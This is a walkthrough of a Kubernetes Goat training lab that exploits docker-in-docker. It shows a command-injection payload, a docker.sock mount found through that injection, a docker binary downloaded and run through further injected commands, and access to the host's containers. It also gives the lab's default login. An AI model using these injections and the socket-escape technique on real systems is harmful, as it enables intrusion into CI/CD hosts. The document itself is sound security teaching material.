DIND(docker-in-docker) exploitation

Scenario Information

Most of the CI/CD and pipeline system which use Docker and build containers for you with in the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to host system.

To get started with the scenario, navigate to http://127.0.0.1:1231 and username is admin and password kubernetesgoat

Scenario 2 Login

Scenario 2 Home

Scenario Solution

By looking at application functionality, identified that it has command injection vulnerability

madhuakula.com; id

Scenario 2 Command Injection

After performing quite some analysis, identified the there is a docker.sock mount available in the file system

mount

Scenario 2 mount

Download the docker static binary from internet https://download.docker.com/linux/static/stable/

;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz

Scenario 2 download docker binary

Extract the binary from the docker-19.03.9.tgz file

;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/

Scenario 2 extract binary

Access he host system by running the following docker commands with docker.sock

;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

Scenario 2 extract binary

Miscellaneous

TBD

Kubernetes Goat

DIND(docker-in-docker) exploitation

Scenario Information

Scenario Solution

Miscellaneous